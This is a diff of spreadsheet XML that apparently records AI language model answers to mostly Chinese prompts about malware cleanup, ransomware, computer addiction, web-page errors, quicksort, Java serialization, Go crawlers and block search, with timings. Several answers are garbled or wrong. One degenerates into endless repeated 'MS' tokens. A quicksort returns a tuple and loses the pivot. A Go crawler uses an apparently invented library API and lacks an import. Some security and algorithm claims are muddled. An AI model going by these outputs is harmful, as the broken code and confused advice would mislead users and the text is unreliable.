+        <v>17.13848471641541</v>
       </c>
     </row>
     <row r="125">
@@ -4190,19 +4211,13 @@
       </c>
       <c r="C125" t="inlineStr">
         <is>
-          <t>？
-您的主机上可能已经被挖矿了，这可能是一个潜在的安全隐患。为了防止攻击者使用您的主机来执行恶意操作，您需要尽可能速地处置您的主机。
-以下是一些处置挖矿木马的建议：
-1. 尽可能速地更新您的主机和软件。这可以减少攻击者的入侵机会。
-2. 停止访问您的主机的任何不安全的网站或应用程序。这可以避免攻击者使用您的主机来执行恶意操作。
-3. 使用安全软件来协助您扫描您的主机并找到挖矿木马。这些软件可以帮助您快速地找到和清除攻击者的恶意软件。
-4. 如果您的主机已经被挖矿，请尽可能速地升级到最新的操作系统和安全软件。这可以减少攻击者的入侵机会。
-5. 如果您的主机已经被挖矿，请尽可能速地寻求专业帮助。安全专家可以帮助您找到和清除攻击者的恶意软件，并提供有关安全的建议。
-请注意，处置挖矿木马的过程可能需要一些时间和精力，但是它是保护您的主机和数据的关键步骤。&lt;/s&gt;</t>
+          <t>MS AccessMS SQL_MSN_F_NDETA
+MS_MS_N_M_SMS_M_E
+_RD MS_M_E MS_M MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MS MSMSMS MS MSMSMS MSMSMS MSMS MSMSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMSMS MSMS MSMS MSMS MSMSMS MSMS MSMS MSMSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS</t>
         </is>
       </c>
       <c r="D125" t="n">
-        <v>14.11928367614746</v>
+        <v>53.14484357833862</v>
       </c>
     </row>
     <row r="126">
@@ -4216,19 +4231,19 @@
       </c>
       <c r="C126" t="inlineStr">
         <is>
-          <t>？
-我的电脑中了勒索病毒，怎么办？
-勒索病毒（Ransomware）是一种危险的软件，它可以循环翻译您的数据，并对您进行费用要求，以换取您的数据的解压。如果您的电脑中了勒索病毒，以下是一些有用的步骤，可以帮助您解决这个问题：
-1. 停止使用电脑：勒索病毒通常会要求您支付费用，以解压您的数据。因此，您应该停止使用电脑，直到您能够得到专业帮助。
-2. 备份数据：如果您的数据已经受到勒索病毒的攻击，那么备份数据是很重要的。您可以使用 clouds 服务或者备份软件来备份您的数据。
-3. 更新操作系统和软件：勒索病毒通常会攻击您的操作系统和软件的漏洞。因此，您应该尽可能地更新操作系统和软件，以避免勒索病毒的攻击。
-4. 使用反勒索软件：有些软件可以帮助您解决勒索病毒的问题。例如，Malwarebytes、Kaspersky 和 Avast 等软件可以帮助您找到和消灭勒索病毒。
-5. 寻求专业帮助：如果您无法解决勒索病毒的问题，您可以寻求专业帮助。您可以随时联系电脑医生或者其他专业的人来解决问题。
-总之，如果您的电脑中了勒索病毒，您应该 acted 迅速，以避免损失您的数据。您可以通过停止使用电脑、备份数据、更新操作系统和软件、使用反勒索软件和寻求专业帮助等方式来解决这个问题。&lt;/s&gt;</t>
+          <t>我的电脑中了一种勒索病毒，我不知道该如何处理。我已经尝试了几种方法，但都没有效果。请问你有什么建议？
+勒索病毒是一种软件，它可以让你的电脑执行恶意的操作，包括泄露你的个人信息、滥用你的钱、洗空你的钱等。如果你的电脑中了勒索病毒，你应该立即采取紧急措施，以防止更大的损失。
+以下是处理勒索病毒的一些常见方法：
+1. 升级系统和软件：确保你的系统和软件是最新的版本，这可以减少勒索病毒的攻击面。
+2. 停止使用电脑：如果你发现电脑中了勒索病毒，一直到你解决问题时，请停止使用电脑。这可以防止勒索病毒继续执行恶意操作。
+3. 寻求专业帮助：如果你无法解决问题，请寻求专业的帮助，例如咨询公司或计算机医生。他们可以帮助你解决问题，并保护你的个人信息和钱。
+4. 使用反勒索软件：反勒索软件可以帮助你找到和删除勒索病毒。你可以尝试使用一些常用的反勒索软件，如Avast、AVG、Malwarebytes等。
+5. 备份数据：如果你的电脑中了勒索病毒，请备份你的重要数据，以防止损失。
+请注意，处理勒索病毒可能需要一些技术知识和经验，如果你不熟悉这方面的事情，请寻求专业帮助。</t>
         </is>
       </c>
       <c r="D126" t="n">
-        <v>20.34660005569458</v>
+        <v>18.0561683177948</v>
       </c>
     </row>
     <row r="127">
@@ -4242,23 +4257,23 @@
       </c>
       <c r="C127" t="inlineStr">
         <is>
-          <t>？How to deal with computer addiction?
-Computer addiction, also known as internet addiction or digital addiction, is a behavioral disorder characterized by excessive use of computers or other digital devices, to the point where it interferes with daily life and relationships. If you or someone you know is struggling with computer addiction, here are some steps you can take to address the problem:
-1. Seek professional help: Computer addiction is a recognized disorder, and seeking help from a mental health professional is the first step towards recovery. A therapist can help you identify the underlying causes of your addiction and develop strategies for managing it.
-2. Set boundaries: Establishing boundaries around computer use can help you avoid falling into the cycle of addiction. For example, you may decide to limit your computer use to certain hours of the day or to certain activities, such as work or socializing.
-3. Find alternative activities: Engaging in activities that are not computer-related can help you break the cycle of addiction. This could include exercise, hobbies, or spending time with friends and family.
-4. Use software tools: There are many software tools available that can help you manage your computer use. For example, you can use time management software to track how much time you spend on your computer, or you can use website blockers to limit your access to certain websites.
-5. Practice self-care: Taking care of yourself is essential for overcoming computer addiction. This can include getting enough sleep, eating a healthy diet, and engaging in relaxation techniques such as meditation or yoga.
-6. Seek support: Having a support system can be helpful for overcoming computer addiction. This could include joining a support group or seeking the help of friends and family.
-7. Take breaks: Taking regular breaks from your computer can help you avoid the cycle of addiction. This could include taking a walk, reading a book, or engaging in a hobby.
-8. Set realistic goals: Setting realistic goals can help you stay motivated and on track. For example, you may decide to limit your computer use to only a certain number of hours per day, or to avoid using your computer for certain activities, such as social media or online gaming.
-9. Monitor progress: Monitoring your progress can help you stay motivated and on track. This could include tracking your computer use, setting goals, and celebrating your successes.
-10. Be patient: Overcoming computer addiction is a process that takes time and effort. It is important to be patient with yourself and to recognize that setbacks are a normal part of the recovery process.
-In conclusion, computer addiction is a serious issue that can have negative consequences for your mental and physical health. However, by seeking professional help, setting boundaries, and practicing self-care, you can overcome computer addiction and lead a healthier, more balanced life.&lt;/s&gt;</t>
+          <t>（How to deal with addiction to computer games）
+Computer games have become a popular form of entertainment for many people, but excessive gaming can lead to addiction. If you or someone you know is addicted to computer games, here are some steps to help you deal with the problem:
+1. Identify the problem: The first step is to recognize that you or your loved one has a problem. Be honest with yourself or your loved one about the amount of time spent playing games and how it is affecting your daily life.
+2. Set limits: Establish limits on the amount of time spent playing games. Set a specific time limit for gaming and stick to it. You can also set a schedule for gaming, such as only playing during specific hours of the day.
+3. Find alternative activities: Encourage the person to engage in other activities, such as exercise, reading, or spending time with friends and family. This can help reduce the temptation to play games excessively.
+4. Seek support: Encourage the person to seek support from friends, family, or a therapist. Joining a support group, such as Gaming Addicts Anonymous, can also be helpful.
+5. Consider therapy: Cognitive-behavioral therapy (CBT) is a helpful approach in treating video game addiction. A therapist can help the person identify the underlying causes of their addiction and develop strategies to manage their gaming habits.
+6. Remove temptations: Remove or limit access to gaming devices, such as computers or gaming consoles, in areas where they are likely to be tempted to play.
+7. Seek professional help: If the addiction is severe, seek professional help from a mental health professional. They can help you or your loved one develop a treatment plan and provide support in overcoming the addiction.
+8. Take breaks: Take regular breaks from gaming to give the brain a chance to rest and recover.
+9. Practice self-care: Encourage the person to practice self-care, such as getting enough sleep, eating a healthy diet, and engaging in regular exercise.
+10. Be patient: Overcoming an addiction takes time and effort. Be patient with yourself or your loved one and recognize that setbacks are a normal part of the recovery process.
+Remember, dealing with addiction is a process, and it may take time to overcome. However, with the right support and strategies, it is possible to overcome an addiction to computer games and lead a healthier, more balanced life.</t>
         </is>
       </c>
       <c r="D127" t="n">
-        <v>16.44144296646118</v>
+        <v>14.40352416038513</v>
       </c>
     </row>
     <row r="128">
@@ -4272,20 +4287,22 @@
       </c>
       <c r="C128" t="inlineStr">
         <is>
-          <t>？
-如果您的网页不能打开，可能有以下原因：
-1. 网络连接不稳定：网页可能无法打开，如果您的网络连接不稳定或者无法连接到网络，这可能导致网页无法打开。
-2. 网站不可用：您可能无法访问某个网站，可能是因为网站进行维护或者受到技术问题的影响。
-3. 浏览器错误：您的浏览器可能有问题，导致网页无法打开。这可能是由于浏览器的更新或者静态检查的问题。
-4. 安全警告：您可能会收到安全警告，指示您不要访问某个网站。这可能是因为网站存在恶意软件或者其他安全隐患。
-5. 防火墙或者扫描器问题：如果您的防火墙或者扫描器不允许访问某个网站，那么网页可能无法打开。
-6. 浏览器扩展问题：您的浏览器可能受到扩展程序的影响，导致网页无法打开。
-7. 系统问题：您的操作系统或者浏览器可能有问题，导致网页无法打开。
-如果您的网页仍然无法打开，可以尝试尝试其他浏览器或者升级您的浏览器。如果问题仍然存在，可以寻求技术支持或者咨询专业人士。&lt;/s&gt;</t>
+          <t>如果您的网页不能打开，这可能是因为以下原因：
+1. 网络连接问题：如果您的网络连接不稳定或不正确，可能无法打开网页。请检查网络连接的正确性，并尝试更换网络连接或重新启动计算机。
+2. 浏览器问题：您的浏览器可能受到了恶意软件或恶意软件的攻击，导致打开网页失败。请尝试升级浏览器到最新的版本，或者卸载恶意软件。
+3. 网站技术问题：网站管理员可能正在解决网站技术问题，导致您无法访问网站。请等待网站管理员解决问题，或者尝试使用其他浏览器打开网站。
+4. 端口问题：网页可能受到端口问题的干扰，导致打开失败。请尝试重新启动计算机或端口服务，或者尝试使用其他端口打开网页。
+5. 安全警告：您的浏览器可能发现网站上存在潜在的安全隐患，导致打开网页失败。请尝试启用浏览器的安全功能，或者尝试使用其他浏览器打开网页。
+6. 网络端口阻塞：网络端口可能受到阻塞，导致打开网页失败。请尝试重新启动计算机或端口服务，或者尝试使用其他端口打开网页。
+7. 浏览器插件问题：您的浏览器可能受到插件问题的影响，导致打开网页失败。请尝试卸载浏览器插件，或者尝试使用其他浏览器打开网页。
+8. 系统问题：您的系统可能受到问题，导致打开网页失败。请尝试升级系统到最新的版本，或者尝试卸载恶意软件。
+9.  DNS 问题：网络可能受到 DNS 问题的影响，导致打开网页失败。请尝试升级 DNS 服务器，或者尝试尝试使用其他 DNS 服务器打开网页。
+10. 网站崩溃：网站可能已经崩溃或停止运行，导致无法打开网页。请尝试尝试其他方法打开网站，或者等待网站管理员解决问题。
+如果您的网页仍然无法打开，请尝试提供更多的信息，如错误提示或网页的具体内容，以便更好地解决问题。</t>
         </is>
       </c>
       <c r="D128" t="n">
-        <v>14.76042580604553</v>
+        <v>25.27295684814453</v>
       </c>
     </row>
     <row r="129">
@@ -4299,37 +4316,22 @@
       </c>
       <c r="C129" t="inlineStr">
         <is>
-          <t>快速排序（Quicksort）是一种快速、高效的排序算法。它的基本思想是将数据分为两个部分，一个是小于或等于中间元素的元素，另一个是大于中间元素的元素。然后对这两个部分进行排序，重复这个过程直到整个数据集都排序完成。
-在Python中，可以使用以下代码实现快速排序算法：
-```
-def quicksort(arr):
+          <t>```
+def quick_sort(arr):
     if len(arr) &lt;= 1:
         return arr
-    else:
-        pivot = arr[0]
-        less = [x for x in arr[1:] if x &lt;= pivot]
-        greater = [x for x in arr[1:] if x &gt; pivot]
-        return quicksort(less) + [pivot] + quicksort(greater)
-```
-这个函数首先 checks if the length of the array is less than or equal to 1, if it is, it returns the array unchanged. Otherwise, it selects the first element of the array as the pivot, and divides the rest of the array into two parts: those elements that are less than or equal to the pivot, and those that are greater than the pivot. Then it recursively applies the quicksort algorithm to the less elements, and then to the greater elements.
-You can test the function by passing in a list of integers, for example:
-```
-arr = [3, 6, 1, 8, 2, 4]
-print(quicksort(arr))
-```
-This will output the sorted list: `[1, 2, 3, 4, 6, 8]`.
-You can also use the `timeit` module to measure the time it takes to sort different sized lists:
-```
-import timeit
-arr = [3, 6, 1, 8, 2, 4]
-timeit.timeit(lambda: quicksort(arr), number=100)
-```
-This will output the time it takes to sort the list 100 times.
-Note: This is a basic implementation of the quicksort algorithm, there are many optimizations and variations of the algorithm that can be used in different scenarios, such as sorting large datasets, or using different data structures.&lt;/s&gt;</t>
+    pivot = arr[0]
+    less = [x for x in arr[1:] if x &lt;= pivot]
+    greater = [x for x in arr[1:] if x &gt; pivot]
+    return quick_sort(less), quick_sort(greater)
+```
+这个算法是基于快速排序算法的，它会在数组中分为两个部分，一个是小于 pivot 的元素，另一个是大于 pivot 的元素。然后对这两个部分进行快速排序，最后将它们合并成一个排序完毕的数组。
+这个算法的时间复杂度为 O(n log n)，其中 n 是数组的大小。这个时间复杂度是快速排序算法的最好情况，因为它可以在大多数情况下只需要执行一些简单的比较操作来排序整个数组。
+但是，这个算法的空间复杂度为 O(n)，这意味着它需要存储整个数组的拷贝，这可能会导致性能下降。因此，在实际应用中，需要考虑使用其他排序算法，例如桶排序或希尔乔布排序等，它们的时间复杂度和空间复杂度都比快速排序算法更优秀。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D129" t="n">
-        <v>14.44775199890137</v>
+        <v>11.84148073196411</v>
       </c>
     </row>
     <row r="130">
@@ -4343,53 +4345,58 @@
       </c>
       <c r="C130" t="inlineStr">
         <is>
-          <t>成一个字节数组，并将其 deserialized 回原始对象
-```
-import java.io.ByteArrayInputStream;
-import java.io.ByteArrayOutputStream;
-import java.io.ObjectInputStream;
-import java.io.ObjectOutputStream;
-public class SerializeDeserialize {
-    public static void main(String[] args) throws Exception {
-        Person person = new Person("Jack", 30);
+          <t>到一个字节stream中
+```
+import java.io.*;
+import java.util.*;
+public class Serialize {
+    public static void main(String[] args) throws IOException {
+        Person person = new Person("Jack", 30, "Java Developer");
         ByteArrayOutputStream bos = new ByteArrayOutputStream();
         ObjectOutputStream oos = new ObjectOutputStream(bos);
         oos.writeObject(person);
-        byte[] serializedData = bos.toByteArray();
-        ByteArrayInputStream bis = new ByteArrayInputStream(serializedData);
-        ObjectInputStream ois = new ObjectInputStream(bis);
-        Person deserializedPerson = (Person) ois.readObject();
-        System.out.println(deserializedPerson);
+        oos.flush();
+        oos.close();
+        byte[] byteArray = bos.toByteArray();
+        System.out.println(new String(byteArray));
     }
 }
-class Person {
+class Person implements Serializable {
     private String name;
     private int age;
-    public Person(String name, int age) {
+    private String profession;
+    public Person(String name, int age, String profession) {
         this.name = name;
         this.age = age;
+        this.profession = profession;
     }
     public String getName() {
         return name;
     }
+    public void setName(String name) {
+        this.name = name;
+    }
     public int getAge() {
         return age;
     }
+    public void setAge(int age) {
+        this.age = age;
+    }
+    public String getProfession() {
+        return profession;
+    }
+    public void setProfession(String profession) {
+        this.profession = profession;
+    }
 }
 ```
-在上面的代码中，我们首先创建了一个 `Person` 对象，然后使用 `ByteArrayOutputStream` 和 `ObjectOutputStream` 将其序列化成一个字节数组。接着，我们使用 `ByteArrayInputStream` 和 `ObjectInputStream` 将其 deserialized 回原始对象。
-需要注意的是，在序列化和 deserialization 过程中，我们需要使用 `writeObject` 和 `readObject` 方法，这些方法可以将对象序列化成字节数组，并将其 deserialized 回原始对象。
-在这个例子中，我们使用了 `Person` 类来测试 serialization 和 deserialization 的过程，但是你可以使用任何类或对象来测试。
-在 serialization 过程中，我们使用 `ObjectOutputStream` 将对象写到字节数组中，并将其 serialized 成一个字节数组。在 deserialization 过程中，我们使用 `ObjectInputStream` 将字节数组解析成一个对象。
-在序列化和 deserialization 过程中，我们需要考虑一些问题，例如：
-* 是否使用了自定义Serializable接口，以便在序列化和 deserialization 过程中进行自定义处理。
-* 是否使用了泛型，以便在序列化和 deserialization 过程中使用泛型的对象。
-* 是否使用了不同的数据类型，例如，如果你需要序列化一个整数，你可以使用 `Integer` 类来实现。
-总之，使用 Java 语言将一个对象序列化成一个字节数组，并将其 deserialized 回原始对象，是一个简单且有效的过程，可以用于各种应用程序中。&lt;/s&gt;</t>
+在上面的代码中，我们首先创建了一个`Person`对象，然后使用`ObjectOutputStream`将其序列化到一个字节流中。最后，我们使用`ByteArrayOutputStream`将这个字节流转换为一个字节数组，并打印出它的内容。
+注意，在序列化对象时，我们需要使用`Serializable`接口，以便在序列化对象时能够正确地访问它的字段。在这个例子中，我们使用`Person`类中的各个字段来序列化对象。
+这个例子只是一个简单的示例，实际情况中可能需要根据具体情况进行更多的配置和处理。例如，可以使用`ObjectStreamClass`来指定要序列化对象的类，或者使用`SerializedObject`来将对象序列化成一个更加简洁的形式。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D130" t="n">
-        <v>21.36724281311035</v>
+        <v>15.8686797618866</v>
       </c>
     </row>
     <row r="131">
@@ -4403,64 +4410,87 @@
       </c>
       <c r="C131" t="inlineStr">
         <is>
-          <t>使用Golang写一个爬虫，可以爬取某个网站的所有内容，并将其保存在文件中。
-首先，我们需要使用`net/http`包来发送HTTP请求，并读取响应的内容。使用`strings`包来处理和分割响应的内容。
-下面是一个简单的爬虫示例，可以爬取某个网站的所有内容：
-```go
+          <t>go Lang中有几种常用的爬虫框架，比如：
+1. Go-crawl：Go-crawl是一个基于Golang的爬虫框架，可以用于爬取网站的内容。
+2. Gocrawler：Gocrawler是一个基于Go的爬虫框架，它提供了一个简单的 API，可以用于爬取网站的内容。
+3. Crawler：Crawler是一个基于Golang的爬虫框架，它提供了一个简单的 API，可以用于爬取网站的内容。
+4. Go-scraper：Go-scraper是一个基于Golang的爬虫框架，它可以用于爬取网站的内容，同时也支持爬取页面的响应体。
+这些框架都提供了一些基本的功能，例如：
+* 爬取网站的内容
+* 爬取页面的响应体
+* 爬取网站的结构
+* 爬取网站的链接
+可以根据具体的需求选择合适的框架来实现。
+在使用Golang写一个爬虫时，需要注意以下几点：
+1. 请求方法：爬虫可以使用 GET、POST、PUT、DELETE 等请求方法来访问网站。
+2. 爬取url：爬虫需要提供爬取url，用于爬取网站的内容。
+3. 爬取标签：爬虫可以使用标签（如：标签）来爬取网站的内容。
+4. 爬取响应体：爬虫需要处理爬取到的响应体，例如：JSON、XML 等。
+5. 爬取链接：爬虫可以使用链接（如：链接）来爬取网站的内容。
+6. 爬取速率：爬虫需要根据爬取速率来控制爬虫的运行，避免访问速度过快导致网站崩溃。
+7. 爬取深度：爬虫可以根据爬取深度来控制爬虫的运行，避免访问过多的网站。
+8. 爬取间隔：爬虫可以根据爬取间隔来控制爬虫的运行，避免访问过快。
+9. 爬取结果：爬虫可以使用结果（如：爬取结果）来存储爬取到的内容。
+这些参数可以根据具体的需求进行配置。
+在使用Golang写一个爬虫时，可以使用以下基本步骤：
+1. 创建一个爬虫 struct 来包含爬虫的配置和内容。
+2. 创建一个爬虫的 main 函数来实现爬虫的运行。
+3. 在 main 函数中，使用 Request 类来发送请求，并使用 Response 类来处理响应。
+4. 在处理响应时，可以使用正则表达式或者字符串处理来提取内容。
+5. 将爬取到的内容存储在一个结果结构体中，例如： Result struct。
+6. 在爬虫运行时，可以根据需要进行配置和控制，例如：控制爬取速率、爬取深度、爬取间隔等。
+以下是一个简单的爬虫示例，使用了 Go-crawl 框架：
+```
 package main
 import (
 	"fmt"
 	"io/ioutil"
+	"log"
 	"net/http"
-	"strings"
+	"time"
+	"github.com/go-crawler/crawler"
 )
+type Result struct {
+	Title string `json:"title"`
+	Links []struct {
+		Href string `json:"href"`
+	} `json:"links"`
+}
 func main() {
-	url := "https://www.example.com" // 要爬取的网站URL
-	page, err := http.Get(url)
-	if err != nil {
-		fmt.Println(err)
-		return
-	}
-	defer page.Body.Close()
-	content, err := ioutil.ReadAll(page.Body)
-	if err != nil {
-		fmt.Println(err)
-		return
-	}
-	// 将响应内容分割成多个分割
-	parts := strings.Split(string(content), "&lt;div&gt;")
-	for _, part := range parts {
-		// 将每一个分割写入文件
-		err = ioutil.WriteFile("output.txt", []byte(part), 0644)
+	// 设置爬虫的配置
+	c := crawler.NewCrawler()
+	c.SetHost("https://www.example.com")
+	c.SetStartPage("")
+	c.SetDepth(1)
+	c.SetInterVal(time.Duration(1) * time.Second)
+	// 爬虫的主要逻辑
+	c.Crawl(func(res *http.Request, resp *http.Response) error {
+		// 解析响应体
+		body, err := ioutil.ReadAll(resp.Body)
 		if err != nil {
-			fmt.Println(err)
-			return
+			return err
 		}
-	}
+		// 提取标题和链接
+		result := &amp;Result{}
+		err = json.Unmarshal(body, result)
+		if err != nil {
+			return err
+		}
+		// 打印标题和链接
+		fmt.Println(result.Title)
+		for _, link := range result.Links {
+			fmt.Println(link.Href)
+		}
+		return nil
+	})
 }
 ```
-在上面的代码中，我们首先使用`http.Get()`函数发送HTTP请求，并读取响应的内容使用`ioutil.ReadAll()`函数。然后，我们将响应内容分割成多个分割，并将每一个分割写入文件中。
-注意，上面的代码只是一个简单的示例，它可能会忽略某些网站的安全提供，例如 Cookie 或其他表单数据。如果你需要更加复杂的爬虫，可以使用更多的包，例如`net/url`、`net/http/httputil`等。
-另外，如果你想要爬取某个网站的特定页面，可以使用`net/http/http.Request` struct 来构建 HTTP 请求，例如：
-```go
-req, err := http.NewRequest("GET", url, nil)
-if err != nil {
-    fmt.Println(err)
-    return
-}
-res, err := http.DefaultClient.Do(req)
-if err != nil {
-    fmt.Println(err)
-    return
-}
-defer res.Body.Close()
-```
-这样，你就可以使用`http.Do()`函数来发送请求了。
-希望这些信息能够帮助你创建一个功能够的爬虫。&lt;/s&gt;</t>
+这个爬虫使用了 Go-crawler 框架，并使用了 Net 包中的 http 类来发送请求。在爬虫的主要逻辑中，使用了 json 包来解析响应体，并提取标题和链接。
+请注意，这只是一个简单的示例，实际情况中可能需要更多的逻辑来处理爬虫的具体行为。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D131" t="n">
-        <v>21.35691118240356</v>
+        <v>45.76587295532227</v>
       </c>
     </row>
     <row r="132">
@@ -4474,17 +4504,16 @@
       </c>
       <c r="C132" t="inlineStr">
         <is>
-          <t>？  
-当采用分块查找时，数据的组织方式通常是以下几种：
-1. 堆栈式：将数据分割成一系列堆栈，每个堆栈包含一个或多个分割。在这种方式中，数据的搜索过程是逐层搜索，从堆栈顶部开始，逐层搜索数据，直到找到要查找的元素。
-2. 树式：将数据分割成一个或多个树，每个树包含一个或多个分割。在这种方式中，数据的搜索过程是逐层搜索，从根节点开始，逐层搜索数据，直到找到要查找的元素。
-3. 链式：将数据分割成一系列链，每个链包含一个或多个分割。在这种方式中，数据的搜索过程是逐个搜索，从链的第一个分割开始，逐个搜索数据，直到找到要查找的元素。
-4. 混合式：将数据分割成多种组织方式，例如堆栈式和树式，或者使用多种组织方式搜索数据。在这种方式中，可以根据具体情况选择合适的组织方式，以提高搜索效率。
-需要注意的是，不同的组织方式会对搜索效率产生不同的影响，因此选择合适的组织方式是非常重要的。&lt;/s&gt;</t>
+          <t>在分块查找算法中，数据的组织方式是一个或多个块。具体来说，每个块都包含一定数量的数据元素，并且每个块都有一个块编号。通常，块编号是从0开始的整数，直到总数据量为块大小的整数倍。
+在分块查找算法中，数据的组织方式可以通过以下方式实现：
+1. 块大小是固定的：在这种方式中，块大小是固定的，即每个块都包含相同的数量的数据元素。
+2. 块大小适应数据量：在这种方式中，块大小可以适应数据量，即每个块都包含相应的数量的数据元素。
+3. 块大小是递增的：在这种方式中，块大小逐渐增加，直到总数据量为块大小的整数倍。
+当采用分块查找时，需要根据实际情况进行数据的组织方式选择，以优化查找效率和精度。</t>
         </is>
       </c>
       <c r="D132" t="n">
-        <v>14.23920559883118</v>
+        <v>10.40744805335999</v>
       </c>
     </row>
     <row r="133">
@@ -4498,79 +4527,65 @@
       </c>
